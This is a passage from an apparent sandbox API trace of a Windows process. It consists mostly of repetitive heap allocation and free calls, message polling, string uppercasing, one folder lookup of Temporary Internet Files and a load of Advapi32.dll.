[0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0202.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0202.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0202.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0202.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0202.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0202.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0202.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0202.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0202.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0202.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0202.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0202.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0202.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0202.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0202.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0202.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0202.817] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Temporary Internet Files", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0x9e1bf8 [0202.817] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0202.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0202.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0202.820] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0202.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0202.820] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0202.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0202.821] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0202.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0202.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0202.821] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0202.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa20 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0202.821] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0202.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0202.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0202.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0202.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0202.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0202.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0202.825] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0202.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0202.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0202.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0202.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0202.826] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0202.826] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0202.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0202.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0202.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0202.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0202.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0202.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0202.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.827] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0202.827] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0202.827] HeapFree (in: 